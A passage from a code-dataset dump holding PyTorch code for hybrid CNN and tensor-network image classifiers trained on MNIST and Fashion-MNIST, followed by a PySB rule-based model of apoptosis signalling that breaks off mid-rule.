= len(para['feature_index'])\r\n para['channel'] = len(para['classes'])\r\n para['data_exp'] = data_exp_to_save_mps(para)\r\n if (para['device'] != 'cpu') and (not tc.cuda.is_available()):\r\n para['device'] = 'cpu'\r\n bf.warning('Cuda is not available in the device...')\r\n bf.warning('Changed to \\'cpu\\' instead...')\r\n return para\r\n\r\n\r\ndef data_exp_to_save_mps(para):\r\n exp = para['TN'].upper() + '_L' + str(para['length']) + '_d' + str(para['d']) + '_chi' + \\\r\n str(para['chi']) + '_classes' + str(para['classes']) + '_' + \\\r\n para['feature_map'] + '_' + para['dataset'].upper()\r\n if para['dataset'].lower() in ['mnist', 'fashion-mnist', 'fashionmnist']:\r\n if (para['cut_size'][0] != 28) or (para['cut_size'][1] != 28):\r\n exp += ('_size' + str(para['cut_size']))\r\n if (para['img_size'][0] != 28) or (para['img_size'][1] != 28):\r\n exp += str(para['img_size'])\r\n elif para['dataset'].lower() in ['cifar10', 'cifar-10']:\r\n if (para['cut_size'][0] != 32) or (para['cut_size'][1] != 32):\r\n exp += ('_size' + str(para['cut_size']))\r\n if (para['img_size'][0] != 32) or (para['img_size'][1] != 32):\r\n exp += str(para['img_size'])\r\n if 'feature_index' in para:\r\n if para['feature_index'] is not None:\r\n exp += '_FindexedNum' + str(len(para['feature_index']))\r\n if para['binary_imgs']:\r\n exp += 'binary'\r\n return exp\r\n\r\n\r\ndef load_saved_tn_smaller_chi_d(para, path1=None):\r\n if para['if_load']:\r\n path = './data/' + para['TN'] + '/'\r\n exp = data_exp_to_save_mps(para)\r\n mps_file = os.path.join(path, exp)\r\n if os.path.isfile(mps_file):\r\n message = 'Load existing ' + para['TN'] + ' data...'\r\n mps, info, _ = load_tensor_network(mps_file, para)\r\n return mps, info, message\r\n elif para['if_load_smaller_chi']:\r\n if path1 is None:\r\n path1 = './data/' + para['TN'] + '_saved/'\r\n chi0 = para['chi']\r\n d0 = para['d']\r\n for d in range(d0, 1, -1):\r\n for chi in range(chi0, 1, -1):\r\n para['d'] = d\r\n para['chi'] = chi\r\n exp = data_exp_to_save_mps(para)\r\n mps_file = os.path.join(path1, exp)\r\n if os.path.isfile(mps_file):\r\n message = 'Load existing ' + para['TN'] + ' with (d, chi) = ' + \\\r\n str((para['d'], para['chi']))\r\n para['chi'], para['d'] = chi0, d0\r\n mps, info, _ = load_tensor_network(\r\n mps_file, para)\r\n return mps, info, message\r\n message = 'No existing smaller-chi/d ' + \\\r\n para['TN'] + ' found...\\n ' \\\r\n 'Create new ' + para['TN'] + ' data ...'\r\n para['chi'], para['d'] = chi0, d0\r\n return None, None, message\r\n else:\r\n message = 'No existing ' + para['TN'] + ' found...\\n Create new ' + \\\r\n para['TN'] + ' data ...'\r\n return None, None, message\r\n else:\r\n return None, None, 'Create new ' + para['TN'] + ' data ...'\r\n\r\n\r\ndef mask_x(x, eps_mask, train):\r\n if train:\r\n mask = (x.data > eps_mask)\r\n x = x * mask + 1e-12\r\n s = x.shape\r\n norm = x.data.permute(0, 1, 3, 4, 2).reshape(-1, s[2]).norm(dim=1)\r\n norm = norm.reshape(s[0], s[3], s[4])\r\n x = tc.einsum('ncdxy,nxy->ncdxy', x, 1 / norm)\r\n return x\r\n\r\n\r\n# ==========================================================================================\r\n# Collected hybrid models\r\n\r\n\r\ndef Paras_VL_CNN_BTN_Collected1():\r\n para = parameter_default()\r\n para['TN'] = 'VL_CNN_BTN_Collected1'\r\n para['batch_size'] = 600\r\n para['d'] = 4\r\n para['chi'] = 24\r\n para['feature_map'] = 'cos_sin'\r\n para['normalize_tensors'] = 'norm2'\r\n para['update_way'] = 'rotate'\r\n\r\n para['mps_init'] = 'randn'\r\n para['Lagrangian_way'] = 0\r\n para['Lagrangian'] = None\r\n para['check_time'] = 5\r\n para['save_time'] = 1000\r\n para['it_time'] = 1000\r\n para['lr'] = [1e-4, 2e-2]\r\n return para\r\n\r\n\r\nclass VL_CNN_BTN_Collected1_BP(TTN_basic):\r\n \"\"\"\r\n train_acc test_acc\r\n MNIST(d=4,chi=24) 0.999633 0.9887\r\n f-MNIST(d=4,chi=24) 0.971017 0.8966\r\n f-MNIST(d=4,chi=14) 0.971883\t 0.8887\r\n \"\"\"\r\n def __init__(self, para_tn, tensors=None):\r\n super(VL_CNN_BTN_Collected1_BP, self).__init__(num_layers=6)\r\n theta = 1\r\n self.f_map = para_tn['feature_map']\r\n add_bias = False\r\n pre_process_tensors = 'square' # 'normalize', 'softmax', 'square'\r\n self.layer0 = nn.Sequential(\r\n nn.Conv2d(1, 8, kernel_size=3), # 26*26\r\n nn.LayerNorm([8, 26, 26], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 13*13\r\n ).to(device=para_tn['device'])\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(8, 32, kernel_size=4), # 10*10\r\n nn.LayerNorm([32, 10, 10], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 5*5\r\n ).to(device=para_tn['device'])\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(32, 64, kernel_size=2), # 4*4\r\n nn.LayerNorm([64, 4, 4], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 2*2\r\n ).to(device=para_tn['device'])\r\n\r\n self.layer3 = TTN_Pool_2by2to1(\r\n 1, 1, 4, 4, para_tn['d'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer4 = TTN_Pool_2by2to1(\r\n 1, 1, 2, 2, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer5 = TTN_Pool_2by2to1(\r\n 1, 1, 1, 1, para_tn['chi'], para_tn['channel'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.input_tensors(tensors)\r\n\r\n def forward(self, x):\r\n num = x.shape[0]\r\n x = x.reshape(-1, 1, 28, 28)\r\n for n in range(6):\r\n if n == 3:\r\n x = x.reshape(-1, 4)\r\n x = nn.Softmax(dim=1)(x)\r\n x = x.reshape(num, 8, 8, 4, 1).permute(\r\n 0, 4, 3, 1, 2)\r\n x = eval('self.layer' + str(n) + '(x)')\r\n x = x.squeeze()\r\n # print(x.sum(dim=1))\r\n return x\r\n\r\n\r\ndef Paras_VL_CNN_BTN_Collected2():\r\n para = parameter_default()\r\n para['TN'] = 'CNN_BTN_Collected2'\r\n para['batch_size'] = 600\r\n para['d'] = 4\r\n para['chi'] = 24\r\n para['feature_map'] = 'cos_sin'\r\n para['normalize_tensors'] = 'norm2'\r\n para['update_way'] = 'rotate'\r\n\r\n para['mps_init'] = 'randn'\r\n para['Lagrangian_way'] = 0\r\n para['Lagrangian'] = None\r\n para['check_time'] = 5\r\n para['save_time'] = 1000\r\n para['it_time'] = 1000\r\n para['lr'] = [1e-4, 2e-2]\r\n return para\r\n\r\n\r\nclass VL_CNN_BTN_Collected2_BP(TTN_basic):\r\n \"\"\"\r\n train_acc test_acc\r\n MNIST\r\n f-MNIST(d=4, chi=24) 0.971217 0.8858\r\n \"\"\"\r\n\r\n def __init__(self, para_tn, tensors=None):\r\n super(VL_CNN_BTN_Collected2_BP, self).__init__(num_layers=6)\r\n theta = 1\r\n self.f_map = para_tn['feature_map']\r\n add_bias = False\r\n pre_process_tensors = 'square' # 'normalize', 'softmax', 'square'\r\n self.layer0 = nn.Sequential(\r\n nn.Conv2d(1, 4, kernel_size=3), # 26*26\r\n nn.LayerNorm([4, 26, 26], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(4, 8, kernel_size=3), # 24*24\r\n nn.LayerNorm([8, 24, 24], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 12*12\r\n ).to(device=para_tn['device'])\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(8, 32, kernel_size=3), # 10*10\r\n nn.LayerNorm([32, 10, 10], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 5*5\r\n ).to(device=para_tn['device'])\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(32, 64, kernel_size=2), # 4*4\r\n nn.LayerNorm([64, 4, 4], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 2*2\r\n ).to(device=para_tn['device'])\r\n\r\n self.layer3 = TTN_Pool_2xto1(\r\n 1, 1, 32, 1, para_tn['d'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer4 = TTN_Pool_2xto1(\r\n 1, 1, 16, 1, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer5 = TTN_Pool_2xto1(\r\n 1, 1, 8, 1, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer6 = TTN_Pool_2xto1(\r\n 1, 1, 4, 1, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer7 = TTN_Pool_2xto1(\r\n 1, 1, 2, 1, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer8 = TTN_Pool_2xto1(\r\n 1, 1, 1, 1, para_tn['chi'], para_tn['channel'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.input_tensors(tensors)\r\n\r\n def forward(self, x):\r\n num = x.shape[0]\r\n x = x.reshape(-1, 1, 28, 28)\r\n for n in range(9):\r\n if n == 3:\r\n x = x.reshape(-1, 4)\r\n x = nn.Softmax(dim=1)(x)\r\n x = x.reshape(num, 64, 1, 4, 1).permute(\r\n 0, 4, 3, 1, 2)\r\n x = eval('self.layer' + str(n) + '(x)')\r\n x = x.squeeze()\r\n # print(x.sum(dim=1))\r\n return x\r\n\r\n\r\ndef Paras_VL_CNN_BTN_Collected3():\r\n para = parameter_default()\r\n para['TN'] = 'VL_CNN_BTN_Collected3'\r\n para['batch_size'] = 400\r\n para['d'] = 4\r\n para['chi'] = 24\r\n para['feature_map'] = 'cos_sin'\r\n para['normalize_tensors'] = 'norm2'\r\n para['update_way'] = 'rotate'\r\n\r\n para['mps_init'] = 'randn'\r\n para['Lagrangian_way'] = 0\r\n para['Lagrangian'] = None\r\n para['check_time'] = 5\r\n para['save_time'] = 1000\r\n para['it_time'] = 1000\r\n para['lr'] = [1e-4, 2e-2]\r\n return para\r\n\r\n\r\nclass VL_CNN_BTN_Collected3_BP(TTN_basic):\r\n \"\"\"\r\n train_acc test_acc\r\n MNIST\r\n f-MNIST(d=4, chi=24) 0.9768 0.8862\r\n \"\"\"\r\n def __init__(self, para_tn, tensors=None):\r\n super(VL_CNN_BTN_Collected3_BP, self).__init__(num_layers=6)\r\n theta = 1\r\n self.f_map = para_tn['feature_map']\r\n add_bias = False\r\n pre_process_tensors = 'square' # 'normalize', 'softmax', 'square'\r\n self.layer0 = nn.Sequential(\r\n nn.Conv2d(1, 8, kernel_size=3), # 26*26\r\n nn.LayerNorm([8, 26, 26], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 13*13\r\n ).to(device=para_tn['device'])\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(8, 32, kernel_size=4), # 10*10\r\n nn.LayerNorm([32, 10, 10], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 5*5\r\n ).to(device=para_tn['device'])\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(32, 64, kernel_size=2), # 4*4\r\n nn.LayerNorm([64, 4, 4], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 2*2\r\n ).to(device=para_tn['device'])\r\n\r\n self.layer3 = TTN_PoolTI_2by2to1(\r\n 1, 1, para_tn['d'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer4 = TTN_Pool_2by2to1(\r\n 1, 1, 2, 2, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer5 = TTN_Pool_2by2to1(\r\n 1, 1, 1, 1, para_tn['chi'], para_tn['channel'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.input_tensors(tensors)\r\n\r\n def forward(self, x):\r\n num = x.shape[0]\r\n x = x.reshape(-1, 1, 28, 28)\r\n for n in range(6):\r\n if n == 3:\r\n x = x.reshape(-1, 4)\r\n x = nn.Softmax(dim=1)(x)\r\n x = x.reshape(num, 8, 8, 4, 1).permute(\r\n 0, 4, 3, 1, 2)\r\n x = eval('self.layer' + str(n) + '(x)')\r\n x = x.squeeze()\r\n # print(x.sum(dim=1))\r\n return x\r\n\r\n\r\ndef Paras_VL_CNN():\r\n para = parameter_default()\r\n para['TN'] = 'VL_CNN'\r\n para['batch_size'] = 600\r\n para['normalize_tensors'] = 'norm2'\r\n\r\n para['mps_init'] = 'randn'\r\n para['check_time'] = 5\r\n para['save_time'] = 1000\r\n\r\n para['it_time'] = 1000\r\n para['lr'] = [1e-4, 2e-2]\r\n return para\r\n\r\n\r\nclass VL_CNN_BP(TTN_basic):\r\n \"\"\"\r\n train_acc test_acc\r\n MNIST\r\n f-MNIST 0.962283 0.8917\r\n \"\"\"\r\n def __init__(self, para_tn):\r\n super(VL_CNN_BP, self).__init__(num_layers=6)\r\n self.layer0 = nn.Sequential(\r\n nn.Conv2d(1, 8, kernel_size=3), # 26*26\r\n nn.LayerNorm([8, 26, 26], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 13*13\r\n ).to(device=para_tn['device'])\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(8, 32, kernel_size=4), # 10*10\r\n nn.LayerNorm([32, 10, 10], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 5*5\r\n ).to(device=para_tn['device'])\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(32, 64, kernel_size=2), # 4*4\r\n nn.LayerNorm([64, 4, 4], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 2*2\r\n ).to(device=para_tn['device'])\r\n self.layer3 = nn.Sequential(\r\n nn.Linear(64*4, 64),\r\n nn.ReLU(inplace=True),\r\n nn.Linear(64, para_tn['channel']),\r\n nn.Sigmoid()\r\n ).to(device=para_tn['device'])\r\n\r\n def forward(self, x):\r\n num = x.shape[0]\r\n x = x.reshape(-1, 1, 28, 28)\r\n for n in range(4):\r\n if n == 3:\r\n x = x.reshape(num, -1)\r\n x = eval('self.layer' + str(n) + '(x)')\r\n x = x.squeeze()\r\n # print(x.sum(dim=1))\r\n return x\r\n\r\n\r\n\r\n\r\n"} {"ext": "py", "sha": "1a309747944874819deadeeae08a916c713b861e", "content": "# exported from PySB model 'model'\n\nfrom pysb import Model, Monomer, Parameter, Expression, Compartment, Rule, Observable, Initial, MatchOnce, Annotation, ANY, WILD\n\nModel()\n\nMonomer('Ligand', ['Receptor'])\nMonomer('ParpU', ['C3A'])\nMonomer('C8A', ['BidU', 'C3pro'])\nMonomer('SmacM', ['BaxA'])\nMonomer('BaxM', ['BidM', 'BaxA'])\nMonomer('Apop', ['C3pro', 'Xiap'])\nMonomer('Fadd', ['Receptor', 'C8pro'])\nMonomer('SmacC', ['Xiap'])\nMonomer('ParpC')\nMonomer('Xiap', ['SmacC', 'Apop', 'C3A'])\nMonomer('C9')\nMonomer('C3ub')\nMonomer('C8pro', ['Fadd', 'C6A'])\nMonomer('Bcl2', ['BidM', 'BaxA'])\nMonomer('C3pro', ['Apop', 'C8A'])\nMonomer('CytoCM', ['BaxA'])\nMonomer('CytoCC')\nMonomer('BaxA', ['BaxM', 'Bcl2', 'BaxA_1', 'BaxA_2', 'SmacM', 'CytoCM'])\nMonomer('ApafI')\nMonomer('BidU', ['C8A'])\nMonomer('BidT')\nMonomer('C3A', ['Xiap', 'ParpU', 'C6pro'])\nMonomer('ApafA')\nMonomer('BidM', ['BaxM', 'Bcl2'])\nMonomer('Receptor', ['Ligand', 'Fadd'])\nMonomer('C6A', ['C8pro'])\nMonomer('C6pro', ['C3A'])\n\nParameter('bind_0_Ligand_binder_Receptor_binder_target_2kf', 1.0)\nParameter('bind_0_Ligand_binder_Receptor_binder_target_1kr', 1.0)\nParameter('bind_0_Receptor_binder_Fadd_binder_target_2kf', 1.0)\nParameter('bind_0_Receptor_binder_Fadd_binder_target_1kr', 1.0)\nParameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf', 1.0)\nParameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr', 1.0)\nParameter('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc', 1.0)\nParameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf', 1.0)\nParameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr', 1.0)\nParameter('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc', 1.0)\nParameter('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_2kf', 1.0)\nParameter('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_1kr', 1.0)\nParameter('inhibition_0_SmacC_inhibitor_Xiap_inh_target_2kf', 1.0)\nParameter('inhibition_0_SmacC_inhibitor_Xiap_inh_target_1kr', 1.0)\nParameter('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_2kf', 1.0)\nParameter('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_1kr', 1.0)\nParameter('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_2kf', 1.0)\nParameter('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_1kr', 1.0)\nParameter('catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product_1kc', 1.0)\nParameter('inhibition_0_Xiap_inhibitor_Apop_inh_target_2kf', 1.0)\nParameter('inhibition_0_Xiap_inhibitor_Apop_inh_target_1kr', 1.0)\nParameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf', 1.0)\nParameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr', 1.0)\nParameter('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc', 1.0)\nParameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf', 1.0)\nParameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr', 1.0)\nParameter('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc', 1.0)\nParameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kf', 1.0)\nParameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kr', 1.0)\nParameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf', 1.0)\nParameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr', 1.0)\nParameter('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc', 1.0)\nParameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf', 1.0)\nParameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr', 1.0)\nParameter('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc', 1.0)\nParameter('inhibition_0_Bcl2_inhibitor_BidM_inh_target_2kf', 1.0)\nParameter('inhibition_0_Bcl2_inhibitor_BidM_inh_target_1kr', 1.0)\nParameter('inhibition_0_Bcl2_inhibitor_BaxA_inh_target_2kf', 1.0)\nParameter('inhibition_0_Bcl2_inhibitor_BaxA_inh_target_1kr', 1.0)\nParameter('pore_formation_0_BaxA_pore_2kf', 1.0)\nParameter('pore_formation_0_BaxA_pore_1kr', 1.0)\nParameter('pore_formation_1_BaxA_pore_2kf', 1.0)\nParameter('pore_formation_1_BaxA_pore_1kr', 1.0)\nParameter('pore_formation_2_BaxA_pore_2kf', 1.0)\nParameter('pore_formation_2_BaxA_pore_1kr', 1.0)\nParameter('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_2kf', 1.0)\nParameter('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kr', 1.0)\nParameter('transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kc', 1.0)\nParameter('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_2kf', 1.0)\nParameter('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kr', 1.0)\nParameter('transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kc', 1.0)\nParameter('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_2kf', 1.0)\nParameter('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_1kr', 1.0)\nParameter('catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product_1kc', 1.0)\nParameter('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_2kf', 1.0)\nParameter('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_1kr', 1.0)\nParameter('catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product_1kc', 1.0)\nParameter('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_2kf', 1.0)\nParameter('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_1kr', 1.0)\nParameter('catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product_1kc', 1.0)\nParameter('Ligand_0', 1000.0)\nParameter('ParpU_0', 1000000.0)\nParameter('C8A_0', 0.0)\nParameter('SmacM_0', 100000.0)\nParameter('BaxM_0', 40000.0)\nParameter('Apop_0', 0.0)\nParameter('Fadd_0', 130000.0)\nParameter('SmacC_0', 0.0)\nParameter('ParpC_0', 0.0)\nParameter('Xiap_0', 82500.0)\nParameter('C9_0', 100000.0)\nParameter('C3ub_0', 0.0)\nParameter('C8pro_0', 130000.0)\nParameter('Bcl2_0', 328000.0)\nParameter('C3pro_0', 21000.0)\nParameter('CytoCM_0', 500000.0)\nParameter('CytoCC_0', 0.0)\nParameter('BaxA_0', 0.0)\nParameter('ApafI_0', 100000.0)\nParameter('BidU_0', 171000.0)\nParameter('BidT_0', 0.0)\nParameter('C3A_0', 0.0)\nParameter('ApafA_0', 0.0)\nParameter('BidM_0', 0.0)\nParameter('Receptor_0', 100.0)\nParameter('C6A_0', 0.0)\nParameter('C6pro_0', 100.0)\n\nObservable('Ligand_obs', Ligand())\nObservable('ParpU_obs', ParpU())\nObservable('C8A_obs', C8A())\nObservable('SmacM_obs', SmacM())\nObservable('BaxM_obs', BaxM())\nObservable('Apop_obs', Apop())\nObservable('Fadd_obs', Fadd())\nObservable('SmacC_obs', SmacC())\nObservable('ParpC_obs', ParpC())\nObservable('Xiap_obs', Xiap())\nObservable('C9_obs', C9())\nObservable('C3ub_obs', C3ub())\nObservable('C8pro_obs', C8pro())\nObservable('Bcl2_obs', Bcl2())\nObservable('C3pro_obs', C3pro())\nObservable('CytoCM_obs', CytoCM())\nObservable('CytoCC_obs', CytoCC())\nObservable('BaxA_obs', BaxA())\nObservable('ApafI_obs', ApafI())\nObservable('BidU_obs', BidU())\nObservable('BidT_obs', BidT())\nObservable('C3A_obs', C3A())\nObservable('ApafA_obs', ApafA())\nObservable('BidM_obs', BidM())\nObservable('Receptor_obs', Receptor())\nObservable('C6A_obs', C6A())\nObservable('C6pro_obs', C6pro())\n\nRule('bind_0_Ligand_binder_Receptor_binder_target', Ligand(Receptor=None) + Receptor(Ligand=None, Fadd=None) | Ligand(Receptor=1) % Receptor(Ligand=1, Fadd=None), bind_0_Ligand_binder_Receptor_binder_target_2kf, bind_0_Ligand_binder_Receptor_binder_target_1kr)\nRule('bind_0_Receptor_binder_Fadd_binder_target', Receptor(Ligand=ANY, Fadd=None) + Fadd(Receptor=None, C8pro=None) | Receptor(Ligand=ANY, Fadd=1) % Fadd(Receptor=1, C8pro=None), bind_0_Receptor_binder_Fadd_binder_target_2kf, bind_0_Receptor_binder_Fadd_binder_target_1kr)\nRule('substrate_binding_0_Fadd_catalyzer_C8pro_substrate', Fadd(Receptor=ANY, C8pro=None) + C8pro(Fadd=None, C6A=None) | Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1, C6A=None), substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf, substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr)\nRule('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product', Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1, C6A=None) >> Fadd(Receptor=ANY, C8pro=None) + C8A(BidU=None, C3pro=None), catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc)\nRule('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=None, C3pro=None) + BidU(C8A=None) | C8A(BidU=1, C3pro=None) % BidU(C8A=1), catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf, catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr)\nRule('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=1, C3pro=None) % BidU(C8A=1) >> C8A(BidU=None, C3pro=None) + BidT(), catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc)\nRule('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex', ApafI() + CytoCC() | ApafA(), conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_2kf, conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_1kr)\nRule('inhibition_0_SmacC_inhibitor_Xiap_inh_target', SmacC(Xiap=None) + Xiap(SmacC=None, Apop=None, C3A=None) | SmacC(Xiap=1) % Xiap(SmacC=1, Apop=None, C3A=None), inhibition_0_SmacC_inhibitor_Xiap_inh_target_2kf, inhibition_0_SmacC_inhibitor_Xiap_inh_target_1kr)\nRule('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex', ApafA() + C9() | Apop(C3pro=None, Xiap=None), conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_2kf, conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_1kr)\nRule('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product', Apop(C3pro=None, Xiap=None) + C3pro(Apop=None, C8A=None) | Apop(C3pro=1, Xiap=None) % C3pro(Apop=1, C8A=None), catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_2kf, catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_1kr)\nRule('catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product', Apop(C3pro=1, Xiap=None) % C3pro(Apop=1, C8A=None) >> Apop(C3pro=None, Xiap=None) + C3A(Xiap=None, ParpU=None, C6pro=None), catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product_1kc)\nRule('inhibition_0_Xiap_inhibitor_Apop_inh_target', Xiap(SmacC=None, Apop=None, C3A=None) + Apop(C3pro=None, Xiap=None) | Xiap(SmacC=None, Apop=1, C3A=None) % Apop(C3pro=None, Xiap=1), inhibition_0_Xiap_inhibitor_Apop_inh_target_2kf, inhibition_0_Xiap_inhibitor_Apop_inh_target_1kr)\nRule('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(SmacC=None, Apop=None, C3A=None) + C3A(Xiap=None, ParpU=None, C6pro=None) | Xiap(SmacC=None, Apop=None, C3A=1) % C3A(Xiap=1, ParpU=None, C6pro=None), catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf, catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr)\nRule('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(SmacC=None, Apop=None, C3A=1) % C3A(Xiap=1, ParpU=None, C6pro=None) >> Xiap(SmacC=None, Apop=None, C3A=None) + C3ub(), catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc)\nRule('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=None, C6pro=None) + ParpU(C3A=None) | C3A(Xiap=None, ParpU=1, C6pro=None) % ParpU(C3A=1), catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf, catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr)\nRule('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=1, C6pro=None) % 